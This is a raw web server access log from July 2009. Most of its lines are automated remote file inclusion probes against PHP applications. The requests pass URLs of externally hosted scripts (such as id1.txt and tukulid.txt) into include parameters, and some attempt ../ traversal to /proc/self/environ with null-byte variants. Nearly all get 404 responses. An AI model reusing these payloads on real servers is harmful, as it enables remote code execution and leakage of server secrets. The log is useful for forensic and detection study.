89.223.3.98 - - [12/Jul/2009:01:02:20 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:01:02:20 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:01:03:00 -0400] "GET /logs/access_log.Q109050800%20%20/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:01:03:16 -0400] "GET /logs/access_log.Q109050800%20%20/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:03:20 -0400] "GET /logs/access_log.Q109070300//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:03:23 -0400] "GET /logs/access_log.Q109070300//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:01:03:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.124.127.34 - - [12/Jul/2009:01:04:23 -0400] "GET /logs/access_log.Q109051200//trans/trans.php?trans=&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:01:05:05 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:01:05:05 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:01:05:06 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:01:05:06 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:01:05:07 -0400] "GET /logs/error_log.Q109070600//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:01:05:09 -0400] "GET /logs/error_log.Q109070600//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.68.70 - - [12/Jul/2009:01:05:16 -0400] "GET /images/items/04949701_full.jpg HTTP/1.1" 200 9559 "-" "Googlebot-Image/1.0"
211.189.39.159 - - [12/Jul/2009:01:06:18 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.189.39.159 - - [12/Jul/2009:01:06:18 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.189.39.159 - - [12/Jul/2009:01:06:18 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.189.39.159 - - [12/Jul/2009:01:06:23 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:01:07:34 -0400] "GET /logs/access_log.Q109060500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.80.195.38 - - [12/Jul/2009:01:08:15 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={F6986FC0-01D8-4437-9154-032E9F1ACDE6}; .NET CLR 1.1.4322)"
190.144.44.36 - - [12/Jul/2009:01:08:24 -0400] "GET /logs/error_log.Q109061700%20%20/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:01:08:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [12/Jul/2009:01:08:36 -0400] "GET /logs/error_log.Q109061700%20%20/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.145.31.242 - - [12/Jul/2009:01:08:46 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.145.31.242 - - [12/Jul/2009:01:08:46 -0400] "GET //skin/zero_vote/login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.145.31.242 - - [12/Jul/2009:01:08:46 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
190.144.44.36 - - [12/Jul/2009:01:08:59 -0400] "GET /logs/access_log.Q109050800%20%20/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:01:09:16 -0400] "GET /logs/access_log.Q109050800%20%20/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.145.31.242 - - [12/Jul/2009:01:09:31 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.145.31.242 - - [12/Jul/2009:01:09:31 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.145.31.242 - - [12/Jul/2009:01:09:31 -0400] "GET //skin/zero_vote/login.php?dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.249.36.194 - - [12/Jul/2009:01:10:48 -0400] "GET /logs/error_log.Q109062300/lostpasswd.php?env[include_prefix]=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jul/2009:01:10:48 -0400] "GET /logs/error_log.Q109062300/lostpasswd.php?env[include_prefix]=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jul/2009:01:10:49 -0400] "GET /lostpasswd.php?env[include_prefix]=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jul/2009:01:10:49 -0400] "GET /lostpasswd.php?env[include_prefix]=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jul/2009:01:10:49 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jul/2009:01:10:50 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jul/2009:01:10:50 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jul/2009:01:10:54 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
69.65.41.165 - - [12/Jul/2009:01:11:09 -0400] "GET /logs/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:01:11:09 -0400] "GET /logs/error_log.Q109061700/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:01:11:10 -0400] "GET /errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:01:11:20 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:01:11:39 -0400] "GET /errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:01:11:39 -0400] "GET /logs/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:01:11:39 -0400] "GET /logs/error_log.Q109061700/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:01:11:45 -0400] "GET /errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:01:11:45 -0400] "GET /logs/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:01:11:45 -0400] "GET /logs/error_log.Q109061700/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:01:11:51 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:01:11:57 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.253.240.80 - - [12/Jul/2009:01:13:15 -0400] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:01:13:15 -0400] "GET //spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:01:13:15 -0400] "GET /logs/access_log.Q109060100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:01:13:22 -0400] "GET /logs/access_log.Q109062500//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Jul/2009:01:13:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.65.41.165 - - [12/Jul/2009:01:14:51 -0400] "GET /errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:01:14:51 -0400] "GET /logs/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:01:14:51 -0400] "GET /logs/error_log.Q109061700%20%20/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:01:15:03 -0400] "GET /logs/access_log.Q109050800%20%20/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:01:15:30 -0400] "GET /logs/error_log.Q109061700%20%20/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:01:15:31 -0400] "GET /logs/access_log.Q109050800%20%20/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:01:15:46 -0400] "GET /logs/error_log.Q109061700/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:01:15:47 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.185.157.98 - - [12/Jul/2009:01:15:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
67.185.157.98 - - [12/Jul/2009:01:15:58 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
66.249.68.247 - - [12/Jul/2009:01:17:46 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [12/Jul/2009:01:17:46 -0400] "GET /logs/access_log.Q108041400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.147.30.80 - - [12/Jul/2009:01:18:28 -0400] "GET /logs/access_log.Q109060500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:01:18:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [12/Jul/2009:01:19:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L013410490F2426006961011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.217.51.191 - - [12/Jul/2009:01:21:02 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:01:22:56 -0400] "GET //include/write.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:01:22:56 -0400] "GET /logs//include/write.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:01:22:56 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:01:23:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/admin.php?dir=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 250 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET //skin/zero_vote/admin.php?dir=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 223 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET /logs//skin/zero_vote/admin.php?dir=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 228 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET /errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET /logs/access_log.Q109070200/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET /logs/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET //skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 223 "-" "XXXXXX"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 250 "-" "XXXXXX"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET /logs//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 228 "-" "XXXXXX"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET //skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 223 "-" "XXXXXX"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 250 "-" "XXXXXX"
207.210.89.18 - - [12/Jul/2009:01:23:40 -0400] "GET /logs//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 228 "-" "XXXXXX"
89.253.240.80 - - [12/Jul/2009:01:26:18 -0400] "GET //spaw/spaw_control.classR.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:01:26:18 -0400] "GET /logs/access_log.Q109060100//spaw/spaw_control.classR.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:01:26:18 -0400] "GET /logs//spaw/spaw_control.classR.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:01:26:25 -0400] "GET /logs/access_log.Q109062500//spaw/spaw_control.classR.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
207.210.89.18 - - [12/Jul/2009:01:26:39 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/admin.php?dir=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
207.210.89.18 - - [12/Jul/2009:01:26:39 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
207.210.89.18 - - [12/Jul/2009:01:26:39 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 250 "-" "XXXXXX"
207.210.89.18 - - [12/Jul/2009:01:26:39 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 250 "-" "XXXXXX"
200.107.29.25 - - [12/Jul/2009:01:27:00 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.107.29.25 - - [12/Jul/2009:01:27:01 -0400] "GET //skin/zero_vote/error.php?dir=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.107.29.25 - - [12/Jul/2009:01:27:01 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.107.29.25 - - [12/Jul/2009:01:27:25 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.mops.krakow.pl/mambots/search/copyright.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:03 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:03 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:03 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:03 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:04 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:04 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:04 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:04 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:06 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:06 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:06 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:06 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:01:28:11 -0400] "GET /logs//include/write.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:01:28:11 -0400] "GET /logs/access_log.Q109051100%20%20//include/write.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:01:28:11 -0400] "GET //include/write.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:18 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:18 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:18 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:18 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:01:28:29 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:01:28:29 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:01:28:29 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:01:28:29 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:01:28:29 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:01:28:31 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:01:28:31 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:01:28:31 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
